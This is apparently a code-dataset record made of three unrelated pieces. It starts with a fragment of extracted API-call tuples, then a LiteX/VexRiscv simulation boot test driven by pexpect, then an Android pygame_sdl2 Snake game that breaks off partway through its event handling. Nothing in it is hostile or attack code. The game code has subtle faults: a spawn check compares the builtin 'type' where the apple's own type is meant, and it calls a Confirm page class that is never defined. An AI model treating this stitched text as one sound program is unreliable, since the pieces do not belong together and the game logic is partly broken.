(35023, 35044), True, 'import numpy as np\n'), ((35949, 35977), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (35957, 35977), True, 'import numpy as np\n'), ((36380, 36407), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (36388, 36407), True, 'import numpy as np\n'), ((36821, 36851), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (36829, 36851), True, 'import numpy as np\n'), ((37273, 37303), 'numpy.array', 'np.array', (['[51.0, 102.0, 153.0]'], {}), '([51.0, 102.0, 153.0])\n', (37281, 37303), True, 'import numpy as np\n'), ((37730, 37760), 'numpy.array', 'np.array', (['[219.0, 34.0, 211.0]'], {}), '([219.0, 34.0, 211.0])\n', (37738, 37760), True, 'import numpy as np\n'), ((38195, 38222), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (38203, 38222), True, 'import numpy as np\n'), ((38668, 38698), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (38676, 38698), True, 'import numpy as np\n'), ((39137, 39166), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (39145, 39166), True, 'import numpy as np\n'), ((40084, 40112), 'numpy.array', 'np.array', (['[0.0, 134.0, 61.0]'], {}), '([0.0, 134.0, 61.0])\n', (40092, 40112), True, 'import numpy as np\n'), ((40542, 40569), 'numpy.array', 'np.array', (['[192.0, 0.0, 0.0]'], {}), '([192.0, 0.0, 0.0])\n', (40550, 40569), True, 'import numpy as np\n'), ((41010, 41040), 'numpy.array', 'np.array', (['[51.0, 126.0, 195.0]'], {}), '([51.0, 126.0, 195.0])\n', (41018, 41040), True, 'import numpy as np\n'), ((41494, 41522), 'numpy.array', 'np.array', (['[51.0, 63.0, 79.0]'], {}), '([51.0, 63.0, 79.0])\n', (41502, 41522), True, 'import numpy as np\n'), ((41981, 42010), 'numpy.array', 'np.array', (['[153.0, 0.0, 153.0]'], {}), '([153.0, 0.0, 153.0])\n', (41989, 42010), True, 'import numpy as np\n'), ((42477, 42504), 'numpy.array', 'np.array', (['[192.0, 0.0, 0.0]'], {}), '([192.0, 0.0, 0.0])\n', (42485, 42504), True, 'import numpy as np\n'), ((42982, 43012), 'numpy.array', 'np.array', (['[51.0, 126.0, 195.0]'], {}), '([51.0, 126.0, 195.0])\n', (42990, 43012), True, 'import numpy as np\n'), ((43483, 43512), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (43491, 43512), True, 'import numpy as np\n'), ((44588, 44618), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (44596, 44618), True, 'import numpy as np\n'), ((44681, 44710), 'numpy.array', 'np.array', (['[217.0, 83.0, 25.0]'], {}), '([217.0, 83.0, 25.0])\n', (44689, 44710), True, 'import numpy as np\n'), ((45117, 45145), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (45125, 45145), True, 'import numpy as np\n'), ((45208, 45235), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (45216, 45235), True, 'import numpy as np\n'), ((45627, 45654), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (45635, 45654), True, 'import numpy as np\n'), ((45717, 45747), 'numpy.array', 'np.array', (['[122.0, 48.0, 160.0]'], {}), '([122.0, 48.0, 160.0])\n', (45725, 45747), True, 'import numpy as np\n'), ((46160, 46190), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (46168, 46190), True, 'import numpy as np\n'), ((46607, 46634), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (46615, 46634), True, 'import numpy as np\n'), ((47050, 47080), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (47058, 47080), True, 'import numpy as np\n'), ((47488, 47516), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (47496, 47516), True, 'import numpy as np\n'), ((47947, 47976), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (47955, 47976), True, 'import numpy as np\n'), ((48854, 48885), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (48862, 48885), True, 'import numpy as np\n'), ((49295, 49326), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (49303, 49326), True, 'import numpy as np\n'), ((49737, 49768), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (49745, 49768), True, 'import numpy as np\n'), ((50195, 50226), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (50203, 50226), True, 'import numpy as np\n'), ((9740, 9760), 'utilities.wxdate2pydate', 'wxdate2pydate', (['value'], {}), '(value)\n', (9753, 9760), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((14590, 14610), 'utilities.pydate2wxdate', 'pydate2wxdate', (['value'], {}), '(value)\n', (14603, 14610), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n')]
|
#!/usr/bin/env python3
#
# This file is part of Linux-on-LiteX-VexRiscv
#
# Copyright (c) 2019-2021, Linux-on-LiteX-VexRiscv Developers
# SPDX-License-Identifier: BSD-2-Clause
import os
import sys
import pexpect
import time
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--sdram-module", type=str)
args = parser.parse_args()
tests = [
{
'id': 'linux-on-litex-vexriscv',
'command': f'./sim.py --with-sdram --sdram-module {args.sdram_module}',
'cwd': os.getcwd(),
'checkpoints': [
{ 'timeout': 240, 'good': [b'\n\\s*BIOS built on'] },
{ 'timeout': 60, 'good': [b'\n\\s*VexRiscv Machine Mode software'] },
{ 'timeout': 240, 'good': [b'Memory: \\d+K/\\d+K available'] },
]
}
]
def run_test(id, command, cwd, checkpoints):
print(f'*** Test ID: {id}')
print(f'*** CWD: {cwd}')
print(f'*** Command: {command}')
os.chdir(cwd)
p = pexpect.spawn(command, timeout=None, logfile=sys.stdout.buffer)
checkpoint_id = 0
for cp in checkpoints:
good = cp.get('good', [])
bad = cp.get('bad', [])
patterns = good + bad
timeout = cp.get('timeout', None)
timediff = time.time()
try:
match_id = p.expect(patterns, timeout=timeout)
except pexpect.EOF:
print(f'\n*** {id}: premature termination')
return False;
except pexpect.TIMEOUT:
timediff = time.time() - timediff
print(f'\n*** {id}: timeout (checkpoint {checkpoint_id}: +{int(timediff)}s)')
return False;
timediff = time.time() - timediff
if match_id >= len(good):
break
sys.stdout.buffer.write(b'<<checkpoint %d: +%ds>>' % (checkpoint_id, int(timediff)))
checkpoint_id += 1
is_success = checkpoint_id == len(checkpoints)
# Let it print rest of line
match_id = p.expect_exact([b'\n', pexpect.TIMEOUT, pexpect.EOF], timeout=1)
p.terminate(force=True)
line_break = '\n' if match_id != 0 else ''
print(f'{line_break}*** {id}: {"success" if is_success else "failure"}')
return is_success
for test in tests:
success = run_test(**test)
if not success:
sys.exit(1)
sys.exit(0)
|
[
"pexpect.spawn",
"argparse.ArgumentParser",
"os.getcwd",
"time.time",
"os.chdir",
"sys.exit"
] |
[((273, 289), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (287, 289), False, 'from argparse import ArgumentParser\n'), ((2297, 2308), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2305, 2308), False, 'import sys\n'), ((965, 978), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (973, 978), False, 'import os\n'), ((987, 1050), 'pexpect.spawn', 'pexpect.spawn', (['command'], {'timeout': 'None', 'logfile': 'sys.stdout.buffer'}), '(command, timeout=None, logfile=sys.stdout.buffer)\n', (1000, 1050), False, 'import pexpect\n'), ((528, 539), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (537, 539), False, 'import os\n'), ((1259, 1270), 'time.time', 'time.time', ([], {}), '()\n', (1268, 1270), False, 'import time\n'), ((2284, 2295), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2292, 2295), False, 'import sys\n'), ((1666, 1677), 'time.time', 'time.time', ([], {}), '()\n', (1675, 1677), False, 'import time\n'), ((1508, 1519), 'time.time', 'time.time', ([], {}), '()\n', (1517, 1519), False, 'import time\n')]
|
import pygame_sdl2
pygame_sdl2.import_as_pygame()
import random
import pygame
from pygame.locals import *
import android
class AppleTypes:
NORMAL, GOLDEN, LIFE, SPECIAL = range(4)
class Apple:
def __init__(self, snakes):
retry = True
while retry:
retry = False
self.x = random.randint(0, CELL_COUNT_X - 1)
self.y = random.randint(0, CELL_COUNT_Y - 1)
for snake in snakes:
for i in range(0, snake.length):
if self.x == snake.x[i] and self.y == snake.y[i]:
retry = True
self.type = random.choice([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])
self.expiration = 0
self.moves = 0
self.direction = random.choice([0, 1, 2, 3])
if not type == AppleTypes.NORMAL:
self.expiration = APPLE_EXPIRATION
if type == AppleTypes.SPECIAL:
self.moves = SPECIAL_FRAMES
def move(self):
if self.moves == 0:
dir = random.choice([
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
(self.direction + 1) % 4,
(self.direction + 2) % 4,
(self.direction + 3) % 4])
if dir == 0:
if not self.x == CELL_COUNT_X - 1:
self.x += 1
else:
self.x -= 1
self.direction = 2
if dir == 1:
if not self.y == CELL_COUNT_Y - 1:
self.y += 1
else:
self.y -= 1
self.direction = 3
if dir == 2:
if not self.x == 0:
self.x -= 1
else:
self.x += 1
self.direction = 1
if dir == 3:
if not self.y == 0:
self.y -= 1
else:
self.y += 1
self.direction = 0
self.moves = SPECIAL_FRAMES
else:
self.moves -= 1
def draw(self, surface, cell_size):
body = pygame.Surface((cell_size, cell_size))
body.fill(APPLE_COLORS[self.type])
surface.blit(body, (self.x * cell_size, self.y * cell_size))
class Snake:
def __init__(self, x, y, length, lives, color):
self.x = [x]
self.y = [y]
self.length = length
self.lives = lives
self.color = color
self.expiration = 0
self.temp_color = color
self.direction = 0 if self.x[0] < CELL_COUNT_X / 2 else 2
self.score = 0
for i in range(1, self.length):
self.x.append(self.x[0] - i if self.x[0] < CELL_COUNT_X / 2 else self.x[0] + i)
self.y.append(self.y[0])
def changeDirection(self, direction):
if direction != (self.direction + 2) % 4:
self.direction = direction
return True
return False
def updatePosition(self):
for i in range(self.length - 1 , 0, -1):
self.x[i] = self.x[i - 1]
self.y[i] = self.y[i - 1]
if self.direction == 0:
self.x[0] += 1
elif self.direction == 1:
self.y[0] += 1
elif self.direction == 2:
self.x[0] -= 1
elif self.direction == 3:
self.y[0] -= 1
def isCollision(self, x, y):
if self.x[0] == x and self.y[0] == y:
return True
else:
return False
def changeColor(self, color):
self.temp_color = color
self.expiration = SNAKE_EXPIRATION
def addPiece(self, count):
for i in range(0, count):
self.x.append(self.x[self.length - 1])
self.y.append(self.y[self.length - 1])
self.length += 1
def eatApple(self, apple):
if self.isCollision(apple.x, apple.y):
if apple.type == AppleTypes.NORMAL:
SOUNDS['Apple'].play()
self.addPiece(1)
self.score += 10
elif apple.type == AppleTypes.GOLDEN:
SOUNDS['Golden'].play()
self.addPiece(3)
self.score += 50
elif apple.type == AppleTypes.LIFE:
SOUNDS['Life'].play()
self.addPiece(1)
if self.lives < 5:
self.lives += 1
else:
self.score += 20
elif apple.type == AppleTypes.SPECIAL:
SOUNDS['Special'].play()
self.addPiece(5)
self.score += 100
return True
return False
def hitSnake(self, snake):
for i in range(1 if self is snake else 0, snake.length):
if self.isCollision(snake.x[i], snake.y[i]) and not self.temp_color == RED:
self.score -= 50
self.lives -= 1
return True
return False
def hitBorder(self):
if self.x[0] < 0 or self.x[0] > CELL_COUNT_X - 1:
self.x[0] = CELL_COUNT_X - 1 if self.x[0] < 0 else 0
if not self.temp_color == RED:
self.score -= 20
self.lives -= 1
return True
return False
elif self.y[0] < 0 or self.y[0] > CELL_COUNT_Y - 1:
self.y[0] = CELL_COUNT_Y - 1 if self.y[0] < 0 else 0
if not self.temp_color == RED:
self.score -= 20
self.lives -= 1
return True
return False
else:
return False
def draw(self, surface, cell_size):
body = pygame.Surface((cell_size, cell_size))
body.fill(self.temp_color)
for i in range(0, self.length):
surface.blit(body, (self.x[i] * cell_size, self.y[i] * cell_size))
if self.expiration > 0:
self.expiration -= 1
else:
self.temp_color = self.color
class Game:
def __init__(self, players, fps, controls):
self.fps = fps
self.controls = controls
self.snakes = []
self.snakes.append(Snake(random.randint(0, CELL_COUNT_X / 2), random.randint(0, CELL_COUNT_Y / 2), 15, 3, BLUE))
if players == 2:
self.snakes.append(Snake(random.randint(CELL_COUNT_X / 2, CELL_COUNT_X - 1), random.randint(CELL_COUNT_Y / 2, CELL_COUNT_Y - 1), 15, 3, GREEN))
self.apple = Apple(self.snakes)
def restart(self):
return Game(len(self.snakes), self.fps, self.controls)
def updateSnakes(self):
if self.apple.expiration == 0:
self.apple.type = AppleTypes.NORMAL
else:
self.apple.expiration -= 1
if self.apple.type == AppleTypes.SPECIAL:
self.apple.move()
for snake in self.snakes:
snake.updatePosition()
if snake.hitSnake(snake) or snake.hitBorder():
SOUNDS['Hit'].play()
android.vibrate(0.2)
snake.changeColor(RED)
if snake.lives == 0:
return False
if snake.eatApple(self.apple):
if not self.apple.type == AppleTypes.NORMAL:
snake.changeColor(APPLE_COLORS[self.apple.type])
self.apple = Apple(self.snakes)
return True
def drawSnakes(self, surface, cell_size):
for snake in self.snakes:
snake.draw(surface, cell_size)
self.apple.draw(surface, cell_size)
class Page(object):
def __init__(self, width, height, surface):
self.surface = surface
self.surface.fill(BLACK)
self.buttons = {}
def update(self):
return
def getButton(self, x, y):
for button, rect in self.buttons.items():
if rect.collidepoint(x * self.surface.get_width(), y * self.surface.get_height()):
return button
def display_text(self, text, dimension, color, position, background=None):
font = pygame.font.Font('resources/font.otf', int(dimension))
text_surface = font.render(text, True, color, background)
rect = text_surface.get_rect()
rect.midbottom = position
self.surface.blit(text_surface, rect)
return rect
class Menu(Page):
def __init__(self, width, height, surface):
super(Menu, self).__init__(width, height, surface)
self.display_text('Python', height / 4, BLUE, (2 * width / 7 + width / 64, 2 * height / 5))
self.display_text('VS', height / 7, RED, (width / 2, 2 * height / 5 - height / 50))
self.display_text('Android', height / 4, GREEN, (5 * width / 7, 2 * height / 5))
self.buttons['Single'] = self.display_text('Single Player', height / 10, WHITE, (width / 3, 4.5 * height / 7))
self.buttons['Multi'] = self.display_text('Multi Player', height / 10, WHITE, (2 * width / 3, 4.5 * height / 7))
self.buttons['Settings'] = self.display_text(' Settings ', height / 10, BLACK, (width / 3, 6 * height / 7), WHITE)
self.buttons['Leaderboard'] = self.display_text(' Leaderboard ', height / 10, BLACK, (2 * width / 3, 6 * height / 7), WHITE)
class Leaderboard(Page):
def __init__(self, width, height, surface):
super(Leaderboard, self).__init__(width, height, surface)
self.display_text('Leaderboard:', height / 6, YELLOW, (width / 2, 2 * height / 7))
difficulty = ['Easy', 'Normal', 'Hard']
for i in range (1, 4):
self.display_text(str(i) + '.', height / 10, BLUE, (width / 12, height / 2 + (i + 1) * height / 10))
self.display_text(difficulty[i - 1], height / 8, RED, (i * width / 4, height / 2))
self.scores = {
DIFFICULTY['Easy']: [],
DIFFICULTY['Normal']: [],
DIFFICULTY['Hard']: []
}
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
def update(self):
super(Leaderboard, self).update()
width = self.surface.get_width()
height = self.surface.get_height()
score = self.scores[DIFFICULTY['Easy']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (width / 4, height / 2 + (i + 2) * height / 10))
score = self.scores[DIFFICULTY['Normal']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (width / 2, height / 2 + (i + 2) * height / 10))
score = self.scores[DIFFICULTY['Hard']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (3 * width / 4, height / 2 + (i + 2) * height / 10))
class Settings(Page):
def __init__(self, width, height, surface):
super(Settings, self).__init__(width, height, surface)
self.display_text('Difficulty:', height / 7, WHITE, (width / 3, 2 * height / 6))
self.display_text('Controls:', height / 7, WHITE, (width / 3 - width / 70, 7 * height / 12))
self.display_text('Audio:', height / 7, WHITE, (width / 3 - width / 20, 5 * height / 6))
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
self.difficulty = 1
self.controls = 0
self.sound = True
self.music = True
self.loadSettings()
pygame.mixer.music.set_volume(1 if self.music else 0)
def update(self):
super(Settings, self).update()
width = self.surface.get_width()
height = self.surface.get_height()
key = list(DIFFICULTY.keys())[self.difficulty]
self.buttons['Difficulty'] = self.display_text(' ' + key + ' ', height / 7, RED, (7 * width / 10, 2 * height / 6), BLACK)
self.buttons['Controls'] = self.display_text(' ' + CONTROLS[self.controls] + ' ', height / 7, RED, (7 * width / 10, 7 * height / 12), BLACK)
self.buttons['Music'] = self.display_text(' Music ', height / 9, WHITE if self.music else RED, (4 * width / 5, 5 * height / 6 - height / 50), RED if self.music else BLACK)
self.buttons['Sound'] = self.display_text(' Sound ', height / 9, WHITE if self.sound else RED, (3 * width / 5, 5 * height / 6 - height / 50), RED if self.sound else BLACK)
def loadSettings(self):
try:
with open('resources/.settings', 'r') as f:
for line in f:
settings = line.split(':')
if settings[0] == 'Difficulty':
self.difficulty = int(settings[1][:-1])
elif settings[0] == 'Controls':
self.controls = int(settings[1][:-1])
elif settings[0] == 'Music':
self.music = settings[1][:-1] == 'True'
elif settings[0] == 'Sound':
self.sound = settings[1][:-1] == 'True'
except:
pass
def saveSettings(self):
with open('resources/.settings', 'w') as f:
f.write('Difficulty:' + str(self.difficulty) + '\n')
f.write('Controls:' + str(self.controls) + '\n')
f.write('Music:' + str(self.music) + '\n')
f.write('Sound:' + str(self.sound) + '\n')
class GameField(Page):
def __init__(self, width, height, cell_size, surface):
super(GameField, self).__init__(width, height, surface)
self.cell_size = cell_size
self.game = None
def update(self):
super(GameField, self).update()
self.surface.fill(BLACK)
width = self.surface.get_width()
height = self.surface.get_height()
if not self.game == None:
rect = self.display_text('Python: ' + str(self.game.snakes[0].score), height / 10, BLUE, (width / 8, height / 7), BLACK)
self.display_text('x' + str(self.game.snakes[0].lives), height / 16, BLUE, (rect.right + width / 30, height / 7 - height / 100), BLACK)
# if len(self.game.snakes) == 2:
# rect = self.display_text('Viper: ' + str(self.game.snakes[1].score), height / 10, GREEN, (width / 1.13, height / 7))
# self.display_text('x' + str(self.game.snakes[1].lives), height / 16, GREEN, (rect.left - width / 40, height / 7 - height / 100))
self.game.drawSnakes(self.surface, self.cell_size)
if self.game.controls == CONTROLS.index('Touch'):
if self.game.snakes[0].direction % 2 == 0:
self.buttons['Up'] = Rect(0, 0, width, height / 2)
self.buttons['Down'] = Rect(0, height / 2, width, height / 2)
self.buttons['Left'] = Rect(0, 0, 0, 0)
self.buttons['Right'] = Rect(0, 0, 0, 0)
else:
self.buttons['Left'] = Rect(0, 0, width / 2, height)
self.buttons['Right'] = Rect(width / 2, 0, width / 2, height)
self.buttons['Up'] = Rect(0, 0, 0, 0)
self.buttons['Down'] = Rect(0, 0, 0, 0)
elif self.game.controls == CONTROLS.index('Buttons'):
pointlist = [
(width / 5 - height / 14, 5 * height / 7 - height / 28),
(width / 5, 4 * height / 7 - height / 28),
(width / 5 + height / 14, 5 * height / 7 - height / 28)
]
self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 - height / 14, 5 * height / 7 + height / 28),
(width / 5, 6 * height / 7 + height / 28),
(width / 5 + height / 14, 5 * height / 7 + height / 28)
]
self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 - height / 28, 5 * height / 7 + height / 14),
(4 * width / 5 - height / 28 - height / 7, 5 * height / 7),
(4 * width / 5 - height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 + height / 28, 5 * height / 7 + height / 14),
(4 * width / 5 + height / 28 + height / 7, 5 * height / 7),
(4 * width / 5 + height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
elif self.game.controls == CONTROLS.index('Inverted'):
pointlist = [
(4 * width / 5 - height / 14, 5 * height / 7 - height / 28),
(4 * width / 5, 4 * height / 7 - height / 28),
(4 * width / 5 + height / 14, 5 * height / 7 - height / 28)
]
self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 - height / 14, 5 * height / 7 + height / 28),
(4 * width / 5, 6 * height / 7 + height / 28),
(4 * width / 5 + height / 14, 5 * height / 7 + height / 28)
]
self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 - height / 28, 5 * height / 7 + height / 14),
(width / 5 - height / 28 - height / 7, 5 * height / 7),
(width / 5 - height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 + height / 28, 5 * height / 7 + height / 14),
(width / 5 + height / 28 + height / 7, 5 * height / 7),
(width / 5 + height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
class Pause(Page):
def __init__(self, width, height, surface, game_surface):
super(Pause, self).__init__(width, height, surface)
self.surface.fill(WHITE)
self.game_surface = game_surface
self.game_surface.set_alpha(220)
self.surface.blit(self.game_surface, (0, 0))
self.display_text('Paused', height / 4, YELLOW, (width / 2, height / 2))
self.buttons['Menu'] = self.display_text('Back to Menu', height / 8, RED, (5 * width / 16, 3 * height / 4))
self.buttons['Unpause'] = self.display_text('Resume', height / 8, GREEN, (11 * width / 16, 3 * height / 4))
class NotImplementedPage(Page):
def __init__(self, width, height, surface):
super(NotImplementedPage, self).__init__(width, height, surface)
self.display_text('Feature not yet implemented', height / 8, RED, (width / 2, 4 * height / 7))
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
class GameOver(Page):
def __init__(self, width, height, game, scores, surface):
super(GameOver, self).__init__(width, height, surface)
self.game = game
self.scores = scores
self.display_text('Game Over!', height / 4, RED, (width / 2, 2 * height / 6))
if not self.game == None:
if len(self.game.snakes) == 1:
self.display_text('Score: ' + str(self.game.snakes[0].score), height / 8, GREEN, (width / 2, height / 2))
self.display_text('Leaderboard:', height / 10, WHITE, (width / 2, 4 * height / 7 + height / 10))
self.scores.append(self.game.snakes[0].score)
self.scores = list(set(self.scores))
self.scores.sort(reverse=True)
for i in range(0, min(len(self.scores), 3)):
self.display_text(str(i + 1) + '. ', height / 15, GREEN if self.scores[i] == self.game.snakes[0].score else WHITE, (3 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
self.display_text(str(self.scores[i]), height / 15, GREEN if self.scores[i] == self.game.snakes[0].score else WHITE, (4 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
else:
pass
# total = []
# self.display_text('Score:', height / 15, BLUE, (width / 6, 3 * height / 7))
# self.display_text(str(self.game.snakes[0].score), height / 15, BLUE, (2 * width / 6, 3 * height / 7))
# self.display_text('Lives:', height / 15, BLUE, (width / 6, 4 * height / 7))
# self.display_text(str(self.game.snakes[0].lives * 20), height / 15, BLUE, (2 * width / 6, 4 * height / 7))
# pygame.draw.line(self.surface, WHITE, (width / 8, 4 * height / 7 + height / 30), (3 * width / 8, 4 * height / 7 + height / 30), 8)
# total.append(self.game.snakes[0].score + self.game.snakes[0].lives * 20)
# self.display_text('Total:', height / 15, BLUE, (width / 6, 5 * height / 7))
# self.display_text(str(total[0]), height / 15, BLUE, (2 * width / 6, 5 * height / 7))
# self.display_text('Score:', height / 15, GREEN, (4 * width / 6, 3 * height / 7))
# self.display_text(str(self.game.snakes[1].score), height / 15, GREEN, (5 * width / 6, 3 * height / 7))
# self.display_text('Lives:', height / 15, GREEN, (4 * width / 6, 4 * height / 7))
# self.display_text(str(self.game.snakes[1].lives * 20), height / 15, GREEN, (5 * width / 6, 4 * height / 7))
# pygame.draw.line(self.surface, WHITE, (5 * width / 8, 4 * height / 7 + height / 30), (7 * width / 8, 4 * height / 7 + height / 30), 8)
# total.append(self.game.snakes[1].score + self.game.snakes[1].lives * 20)
# self.display_text('Total:', height / 15, GREEN, (4 * width / 6, 5 * height / 7))
# self.display_text(str(total[1]), height / 15, GREEN, (5 * width / 6, 5 * height / 7))
# if total[0] > total[1]:
# self.display_text('Python Won!', height / 8, BLUE, (width / 2, 17 * height / 18))
# elif total[0] < total[1]:
# self.display_text('Viper Won!', height / 8, GREEN, (width / 2, 17 * height / 18))
# else:
# self.display_text('Draw!', height / 8, YELLOW, (width / 2, 17 * height / 18))
self.buttons['Menu'] = self.display_text('Return', height / 10, WHITE, (width / 7, 17 * height / 18))
self.buttons['Restart'] = self.display_text('Restart', height / 10, WHITE, (6 * width / 7, 17 * height / 18))
class UserInterface:
clock = pygame.time.Clock()
def __init__(self, width, height, cell_size):
self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
self.game = None
self.pages = {}
self.pages['Settings'] = Settings(width, height, self.screen)
self.pages['Menu'] = Menu(width, height, self.screen)
self.current_page = None
self.update_flag = True
self.state = None
def fadeBetweenSurfaces(self, surface):
for i in range(0, 255, ANIMATION_SPEED):
surface.set_alpha(i)
self.screen.blit(surface, (0,0))
pygame.display.flip()
def changePage(self, page):
if self.current_page == 'GameOver' and len(self.game.snakes) == 1:
self.saveLeaderboard(self.pages[self.current_page].scores, self.game.fps)
elif self.current_page == 'Settings':
self.pages[self.current_page].saveSettings()
self.playMusic(page)
self.current_page = page
self.update()
def handleGame(self):
self.clock.tick(self.game.fps)
python_flag = False
for event in pygame.event.get():
if event.type == QUIT:
return False
elif event.type == APP_TERMINATING:
return False
elif event.type == APP_WILLENTERBACKGROUND:
self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
self.changePage('Pause')
self.state = self.screen.copy()
return True
elif event.type == KEYDOWN:
if event.key == pygame_sdl2.K_AC_BACK:
pressed = 'Pause'
elif event.type == FINGERDOWN:
pressed = self.pages[self.current_page].getButton(event.x, event.y)
else:
continue
if pressed == 'Menu':
self.pages['Confirm'] = Confirm(width, height, self.screen, self.screen.copy())
self.changePage('Confirm')
elif pressed == 'Pause':
self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
self.changePage('Pause')
elif pressed == 'Up' and not python_flag:
if self.game.snakes[0].changeDirection(3):
python_flag = True
elif pressed == 'Down' and not python_flag:
if self.game.snakes[0].changeDirection(1):
python_flag = True
elif pressed == 'Left' and not python_flag:
if self.game.snakes[0].changeDirection(2):
python_flag = True
elif pressed == 'Right' and not python_flag:
if self.game.snakes[0].changeDirection(0):
python_flag = True
else:
continue
if not self.game.updateSnakes():
self.pages['GameOver'] = GameOver(self.screen.get_width(), self.screen.get_height(), self.game, self.loadLeaderboard(self.game.fps), self.screen)
self.changePage('GameOver')
return True
def handle(self):
while True:
event = pygame.event.wait()
if event.type == QUIT:
return False
elif event.type == APP_TERMINATING:
return False
elif event.type == APP_WILLENTERBACKGROUND:
self.state = self.screen.copy()
return True
elif event.type == APP_DIDENTERFOREGROUND:
self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.screen.blit(self.state, (0, 0))
pygame.display.flip()
return True
elif event.type == KEYDOWN:
if event.key == pygame_sdl2.K_AC_BACK:
if self.current_page == 'Menu':
return False
else:
pressed = 'Menu'
break
elif event.type == FINGERDOWN:
pressed = self.pages[self.current_page].getButton(event.x, event.y)
break
else:
continue
if pressed == 'Single':
self.game = Game(1, list(DIFFICULTY.values())[self.pages['Settings'].difficulty], self.pages['Settings'].controls)
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.changePage('Game')
elif pressed == 'Multi':
# self.game = Game(2, EASY if self.pages['Settings'].easy else HARD)
# self.pages['Game'].game = self.game
# self.pages['GameOver'].game = self.game
# self.changePage('Game')
self.pages['NotImplemented'] = NotImplementedPage(width, height, self.screen)
self.changePage('NotImplemented')
elif pressed == 'Settings':
self.pages['Settings'] = Settings(width, height, self.screen)
self.changePage('Settings')
elif pressed == 'Leaderboard':
self.pages['Leaderboard'] = Leaderboard(width, height, self.screen)
self.pages['Leaderboard'].scores[DIFFICULTY['Easy']] = self.loadLeaderboard(DIFFICULTY['Easy'])
self.pages['Leaderboard'].scores[DIFFICULTY['Normal']] = self.loadLeaderboard(DIFFICULTY['Normal'])
self.pages['Leaderboard'].scores[DIFFICULTY['Hard']] = self.loadLeaderboard(DIFFICULTY['Hard'])
self.changePage('Leaderboard')
elif pressed == 'Difficulty':
self.pages['Settings'].difficulty = (self.pages['Settings'].difficulty + 1) % 3
elif pressed == 'Controls':
self.pages['Settings'].controls = (self.pages['Settings'].controls + 1) % len(CONTROLS)
